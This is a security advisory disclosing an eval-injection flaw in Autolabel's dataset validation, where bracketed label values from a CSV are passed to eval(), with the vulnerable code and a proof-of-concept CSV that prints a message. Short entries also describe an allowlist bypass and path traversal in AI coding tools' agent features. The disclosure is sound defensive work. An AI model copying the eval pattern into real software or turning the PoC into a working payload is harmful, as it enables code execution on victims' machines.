SAI Security Advisory

Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class

September 12, 2024

Products Impacted

This vulnerability is present in Autolabel v0.0.8 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)

Details

To exploit this vulnerability, an attacker would create a malicious CSV file and share this as a dataset with the victim, who would load it for a classification task using AutoLabel. The vulnerability exists in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file (shown below).

def validate(self, value: str):
        """Validate classification

        A classification label(ground_truth) could either be a list or string
        """
        # TODO: This can be made better
        if value.startswith("[") and value.endswith("]"):
            try:
                seed_labels = eval(value)
                if not isinstance(seed_labels, list):
                    raise
                unmatched_label = set(seed_labels) - self.labels_set
                if len(unmatched_label) != 0:
                    raise ValueError(
                        f"labels: '{unmatched_label}' not in prompt/labels provided in config "
                    )
            except SyntaxError:
                raise
        else:
            if value not in self.labels_set:
                raise ValueError(
                    f"labels: '{value}' not in prompt/labels provided in config "
                )

When the user loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the class set with the task_type attribute. If the arguments are wrapped in brackets “[]”, they are passed into an eval function in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file. This allows arbitrary code execution on the victim’s device. An example of a configuration and an example of a malicious CSV are shown below.

from autolabel import AutolabelDataset

config = {
    "task_name": "ToxicCommentClassification",
    "task_type": "classification", # classification task
    "dataset": {
        "label_column": "label",
    },
    "model": {
        "provider": "openai",
        "name": "gpt-3.5-turbo" # the model we want to use
    },
    "prompt": {
        # very simple instructions for the LLM
        "task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
        "labels": [ # list of labels to choose from
            "label",
            "not toxic"
        ],
        "example_template": "Text Snippet: {example}\nClassification: {label}\n{label}"
    }
}

AutolabelDataset('example.csv', config, validate=True)

example_config.py

example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]

example.csv

Related SAI Security Advisory

CVE-2025-62354

November 26, 2025

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

Cursor

When in autorun mode, Cursor checks commands sent to run in the terminal to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic allowing an attacker to craft a command that will execute non-allowed commands.

November 2025
CVE-2025-62353

October 17, 2025

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

Windsurf

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

October 2025